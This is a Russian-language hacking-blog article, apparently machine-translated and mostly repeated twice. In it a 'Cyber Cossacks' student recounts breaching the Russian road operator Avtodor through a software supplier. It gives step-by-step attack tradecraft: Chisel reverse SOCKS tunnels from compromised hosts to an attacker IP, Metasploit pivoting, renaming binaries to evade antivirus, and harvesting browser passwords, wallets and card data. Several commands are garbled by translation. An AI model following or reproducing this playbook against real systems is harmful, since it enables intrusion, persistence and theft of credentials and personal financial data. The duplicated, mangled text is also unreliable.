Добро пожаловать обратно, мои начинающие кибервоины!
Конфликт между Россией и Украиной должен стать для всех вас предостережением о важности кибервойны в наше время. Сейчас любая война содержит в себе элемент кибервойны, и российско-украинский конфликт лишь подчёркивает эту истину.
По просьбе украинских властей мы открыли на Украине школу кибербезопасности под названием «Киберказаки». Эти студенты быстро учились и внесли значительный вклад в ход войны. В этой статье один из наших студентов, Коллатерал, подробно описывает одну из своих атак на российскую инфраструктуру, направленную на поддержку военных действий Украины.
Привет, кибервоины! С вами Overwatch от школы «Киберказаки», и у нас есть совершенно особенная статья.
Как вы знаете, кибероперации стали ключевым фронтом войны на Украине. Пока ракеты и беспилотники привлекают внимание, реальные перемены часто происходят за кулисами, тихо и удалённо. В этой статье подробно описывается одна из таких операций: полная компрометация «Автодора», российской государственной компании, отвечающей за строительство и обслуживание платных дорог и автомагистралей. От систем логистики и безопасности до инфраструктуры сбора платы, их системы интегрированы во всю транспортную сеть России. Мы внедрились в их цепочку поставок. Это сработало лучше, чем ожидалось.
Один из их поставщиков программного обеспечения стал слабым звеном. Мы проникли через них, получили доступ к их инфраструктуре разработки и внедрения и обнаружили, что одним из их крупных клиентов был «Автодор». Оттуда мы разобрали внутреннюю систему проекта — менеджеры задач, хранилище документов, данные входа. Мы взяли всё необходимое и двинулись дальше. Имея на руках учётные данные, мы наметили хосты в Москве и соседних регионах. Это дало нам доступ по всей западной России — в такие города, как Владимир, Кострома, и вплоть до оккупированных Россией территорий, таких как Донецк и Луганск. Все эти сети были объединены и централизованно управлялись из московских офисов «Автодора».
Со временем мы добрались до всех критически важных машин, которые нам были нужны. Мы внедрили инструменты удалённого доступа в их инфраструктуру, чтобы обеспечить доступ в долгосрочной перспективе. Это дало нам полный контроль над системами диспетчеризации и даже производственными системами на их заводах.
Первоначальный доступ был получен от скомпрометированной сторонней компании. Через их системы мы проникли в систему «Автодор». Попав туда, мы нацелились на данные и доступ. Мы изъяли внутренние документы и исходный код, но, что самое главное, собрали учётные данные. Это открыло нам доступ ко всему остальному.
Оперативная карта объектов и адресов «Автодора»
Имея на руках учётные данные, мы незаметно продвигались по сети. Горизонтальное перемещение проходило по обычному пути: общие диски, RDP, слабые сервисные учётные записи. Мы переходили от одной конечной точки к другой, собирая доступы и устанавливая бэкдоры там, где это было необходимо.
Теперь мы находились внутри системы, охватывающей половину страны. Она включала не только гражданскую инфраструктуру, но и ключевые объекты, обслуживающие российскую военную логистику на оккупированной Украине.
Нашей следующей целью было обеспечение устойчивости. Мы не хотели, чтобы нас выкидывало после перезагрузки или проверки антивирусом, поэтому воздержались от использования таких громоздких инструментов, как AnyDesk или ngrok . Оба часто используются для поддержания устойчивости, и «Лаборатория Касперского» регулярно отмечает их как векторы бэкдоров.
Вместо этого мы использовали более тихие инструменты, такие как пользовательские исполняемые файлы, обфусцированные полезные данные и туннелирование с низким трафиком. Мы меняли имена файлов, редактировали исполняемые файлы и сводили активность к минимуму. В этой операции важна была не скорость, а контроль.
OTW утверждает: «Только глупец идет в бой, не разведав должным образом противника».
Вы — гость на враждебной территории, поэтому считайте, что за вами следят. Стоит вам освоиться, и вы совершаете ошибки. Будьте бдительны. Не теряйте бдительности.
Оказавшись внутри, мы начали буквально с наблюдения за происходящим на земле. Взломанные системы находились на крупных заводах, куда постоянно доставляли гранит грузовики. Эти объекты работали круглосуточно, поэтому нам приходилось действовать осторожно. Диспетчерские компьютеры постоянно использовались, поэтому прямое управление через RDP или с рабочего стола было невозможно. Слишком рискованно.
Мы использовали обратные прокси-серверы вместо того, чтобы напрямую прикасаться к устройствам, чтобы никого не тревожить. Такие инструменты, как Chisel или Meterpreter, позволили нам проникнуть внутрь, не активируя сигнализацию.
Вот как мы настраиваем прокси-сервер Chisel:
На компьютере с Kali выполните:
sudo ./chisel сервер –reverse -v -p 1234 –socks5
На целевом объекте (Windows):
chisel.exe клиент -v <IP-адрес атакующего>:1234 R:socks
Если ваша цель — Linux:
./chisel клиент -v <IP-адрес атакующего>:1234 R:socks
Если вас пометили, отредактируйте двоичный файл шестнадцатеричным кодом и измените строку «chisel» на что-то случайное, но той же длины. Это поможет избежать обмана.
Далее обновите конфигурацию proxychains:
судо нано /etc/proxychains4.conf
Добавлять:
носки5 127.0.0.1 1080
Не используйте SOCKS4 — здесь он не сработает. После настройки запустите инструменты следующим образом:
proxychains4 crackmapexec …
proxychains4 гидра …
proxychains4 ssh …
При необходимости добавьте -q для тихого режима:
proxychains4 -q netexec
Если Chisel не подходит, можно использовать Meterpreter. Но учтите — он нестабилен. Иногда он обрывает сеанс при настройке SOCKS-прокси. Вот как это сделать.
Предположим, у вас уже есть сеанс Meterpreter:
meterpreter > run autoroute -s 172.16.0.9/24
Затем:
msf6 > маршрут печати
msf6 > использовать вспомогательный/сервер/socks_proxy
msf6 > установить SRVPORT 1080
msf6 > запустить -j
Если возникнет ошибка или произойдет остановка, завершите все задания и повторите попытку:
msf6 > jobs -K
При необходимости перезапустите msfconsole . Как только прокси-сервер станет стабильным, настройте маршрутизацию инструментов через proxychains, как и раньше.
Не каждая проблема требует технического решения. Иногда нужно просто понаблюдать за людьми. Мы видели, что диспетчеры не сидели у экранов всю смену. Они делали перерывы, выходили поговорить с водителями грузовиков или просто отключались. Это давало нам небольшие окна возможностей — иногда пять минут, иногда больше.
Мы отслеживали эти закономерности. К некоторым терминалам было легко получить доступ, особенно к серверам, за которыми никто не следил. Они работали с базами данных и хранилищами файлов. Через несколько дней мы выяснили, что лучшее время для действий — около полуночи или 4 утра по московскому времени. Трафик снизился. Операторы явно отдыхали или отсутствовали. К 6 утра всё восстанавливалось.
Хотите проверить, сидит ли кто-нибудь за автоматом?
В Windows:
кусер
В Linux:
в
Такая базовая разведка даёт хорошее представление о том, активен ли пользователь. Всегда проверяйте, прежде чем действовать.
В большинстве систем хранились скучные данные — электронные таблицы, счета, сканы. Но настоящее золото таилось в браузерах. Эти пользователи не были осведомлены о безопасности. Они относились к рабочим компьютерам как к домашним. Некоторые синхронизировали аккаунты Яндекса, чтобы сохранять пароли. Другие хранили криптокошельки, номера кредитных карт и даже сид-фразы прямо в браузере.
Мы извлекли всё: электронные письма, историю чатов, сохранённые логины. В некоторых браузерах были открыты вкладки правительственных информационных панелей, систем управления камерами или сторонних логистических панелей. И да, некоторые из них использовали одни и те же пароли везде. Так мы пошли ещё дальше.
Мы не спешили. Это не было налётом. Мы неделями сидели дома, медленно собирая данные, систематизируя их и выстраивая общую картину. Бюрократия многое скрывает, но если копнуть поглубже, то найдёшь то, что ищешь.
Конфликт между Россией и Украиной должен стать для всех вас предостережением о важности кибервойны в наше время. Сейчас любая война содержит в себе элемент кибервойны, и российско-украинский конфликт лишь подчёркивает эту истину.
По просьбе украинских властей мы открыли на Украине школу кибербезопасности под названием «Киберказаки». Эти студенты быстро учились и внесли значительный вклад в ход войны. В этой статье один из наших студентов, Коллатерал, подробно описывает одну из своих атак на российскую инфраструктуру, направленную на поддержку военных действий Украины.
Слава Украине!
Привет, кибервоины! С вами Overwatch от школы «Киберказаки», и у нас есть совершенно особенная статья.
Как вы знаете, кибероперации стали ключевым фронтом войны на Украине. Пока ракеты и беспилотники привлекают внимание, реальные перемены часто происходят за кулисами, тихо и удалённо. В этой статье подробно описывается одна из таких операций: полная компрометация «Автодора», российской государственной компании, отвечающей за строительство и обслуживание платных дорог и автомагистралей. От систем логистики и безопасности до инфраструктуры сбора платы, их системы интегрированы во всю транспортную сеть России. Мы внедрились в их цепочку поставок. Это сработало лучше, чем ожидалось.
Один из их поставщиков программного обеспечения стал слабым звеном. Мы проникли через них, получили доступ к их инфраструктуре разработки и внедрения и обнаружили, что одним из их крупных клиентов был «Автодор». Оттуда мы разобрали внутреннюю систему проекта — менеджеры задач, хранилище документов, данные входа. Мы взяли всё необходимое и двинулись дальше. Имея на руках учётные данные, мы наметили хосты в Москве и соседних регионах. Это дало нам доступ по всей западной России — в такие города, как Владимир, Кострома, и вплоть до оккупированных Россией территорий, таких как Донецк и Луганск. Все эти сети были объединены и централизованно управлялись из московских офисов «Автодора».
Со временем мы добрались до всех критически важных машин, которые нам были нужны. Мы внедрили инструменты удалённого доступа в их инфраструктуру, чтобы обеспечить доступ в долгосрочной перспективе. Это дало нам полный контроль над системами диспетчеризации и даже производственными системами на их заводах.
Вход в цепочку поставок и расширение сети
Первоначальный доступ был получен от скомпрометированной сторонней компании. Через их системы мы проникли в систему «Автодор». Попав туда, мы нацелились на данные и доступ. Мы изъяли внутренние документы и исходный код, но, что самое главное, собрали учётные данные. Это открыло нам доступ ко всему остальному.
Оперативная карта объектов и адресов «Автодора»
Имея на руках учётные данные, мы незаметно продвигались по сети. Горизонтальное перемещение проходило по обычному пути: общие диски, RDP, слабые сервисные учётные записи. Мы переходили от одной конечной точки к другой, собирая доступы и устанавливая бэкдоры там, где это было необходимо.
Теперь мы находились внутри системы, охватывающей половину страны. Она включала не только гражданскую инфраструктуру, но и ключевые объекты, обслуживающие российскую военную логистику на оккупированной Украине.
Инструменты, тактика и как оставаться незамеченным
Нашей следующей целью было обеспечение устойчивости. Мы не хотели, чтобы нас выкидывало после перезагрузки или проверки антивирусом, поэтому воздержались от использования таких громоздких инструментов, как AnyDesk или ngrok . Оба часто используются для поддержания устойчивости, и «Лаборатория Касперского» регулярно отмечает их как векторы бэкдоров.
Вместо этого мы использовали более тихие инструменты, такие как пользовательские исполняемые файлы, обфусцированные полезные данные и туннелирование с низким трафиком. Мы меняли имена файлов, редактировали исполняемые файлы и сводили активность к минимуму. В этой операции важна была не скорость, а контроль.
OTW утверждает: «Только глупец идет в бой, не разведав должным образом противника».
Вы — гость на враждебной территории, поэтому считайте, что за вами следят. Стоит вам освоиться, и вы совершаете ошибки. Будьте бдительны. Не теряйте бдительности.
Разведка с помощью камер и прокси-серверов
Оказавшись внутри, мы начали буквально с наблюдения за происходящим на земле. Взломанные системы находились на крупных заводах, куда постоянно доставляли гранит грузовики. Эти объекты работали круглосуточно, поэтому нам приходилось действовать осторожно. Диспетчерские компьютеры постоянно использовались, поэтому прямое управление через RDP или с рабочего стола было невозможно. Слишком рискованно.
Мы использовали обратные прокси-серверы вместо того, чтобы напрямую прикасаться к устройствам, чтобы никого не тревожить. Такие инструменты, как Chisel или Meterpreter, позволили нам проникнуть внутрь, не активируя сигнализацию.
Вот как мы настраиваем прокси-сервер Chisel:
На компьютере с Kali выполните:
sudo ./chisel сервер –reverse -v -p 1234 –socks5
На целевом объекте (Windows):
chisel.exe клиент -v <IP-адрес атакующего>:1234 R:socks
Если ваша цель — Linux:
./chisel клиент -v <IP-адрес атакующего>:1234 R:socks
Если вас пометили, отредактируйте двоичный файл шестнадцатеричным кодом и измените строку «chisel» на что-то случайное, но той же длины. Это поможет избежать обмана.
Далее обновите конфигурацию proxychains:
судо нано /etc/proxychains4.conf
Добавлять:
носки5 127.0.0.1 1080
Не используйте SOCKS4 — здесь он не сработает. После настройки запустите инструменты следующим образом:
proxychains4 crackmapexec …
proxychains4 гидра …
proxychains4 ssh …
При необходимости добавьте -q для тихого режима:
proxychains4 -q netexec
Если Chisel не подходит, можно использовать Meterpreter. Но учтите — он нестабилен. Иногда он обрывает сеанс при настройке SOCKS-прокси. Вот как это сделать.
Предположим, у вас уже есть сеанс Meterpreter:
meterpreter > run autoroute -s 172.16.0.9/24
Затем:
msf6 > маршрут печати
msf6 > использовать вспомогательный/сервер/socks_proxy
msf6 > установить SRVPORT 1080
msf6 > запустить -j
Если возникнет ошибка или произойдет остановка, завершите все задания и повторите попытку:
msf6 > jobs -K
При необходимости перезапустите msfconsole . Как только прокси-сервер станет стабильным, настройте маршрутизацию инструментов через proxychains, как и раньше.
Поведенческий анализ
Не каждая проблема требует технического решения. Иногда нужно просто понаблюдать за людьми. Мы видели, что диспетчеры не сидели у экранов всю смену. Они делали перерывы, выходили поговорить с водителями грузовиков или просто отключались. Это давало нам небольшие окна возможностей — иногда пять минут, иногда больше.
Мы отслеживали эти закономерности. К некоторым терминалам было легко получить доступ, особенно к серверам, за которыми никто не следил. Они работали с базами данных и хранилищами файлов. Через несколько дней мы выяснили, что лучшее время для действий — около полуночи или 4 утра по московскому времени. Трафик снизился. Операторы явно отдыхали или отсутствовали. К 6 утра всё восстанавливалось.
Хотите проверить, сидит ли кто-нибудь за автоматом?
В Windows:
кусер
В Linux:
в
Такая базовая разведка даёт хорошее представление о том, активен ли пользователь. Всегда проверяйте, прежде чем действовать.
Анализ данных
В большинстве систем хранились скучные данные — электронные таблицы, счета, сканы. Но настоящее золото таилось в браузерах. Эти пользователи не были осведомлены о безопасности. Они относились к рабочим компьютерам как к домашним. Некоторые синхронизировали аккаунты Яндекса, чтобы сохранять пароли. Другие хранили криптокошельки, номера кредитных карт и даже сид-фразы прямо в браузере.
Мы извлекли всё: электронные письма, историю чатов, сохранённые логины. В некоторых браузерах были открыты вкладки правительственных информационных панелей, систем управления камерами или сторонних логистических панелей. И да, некоторые из них использовали одни и те же пароли везде. Так мы пошли ещё дальше.
Мы не спешили. Это не было налётом. Мы неделями сидели дома, медленно собирая данные, систематизируя их и выстраивая общую картину. Бюрократия многое скрывает, но если копнуть поглубже, то найдёшь то, что ищешь.
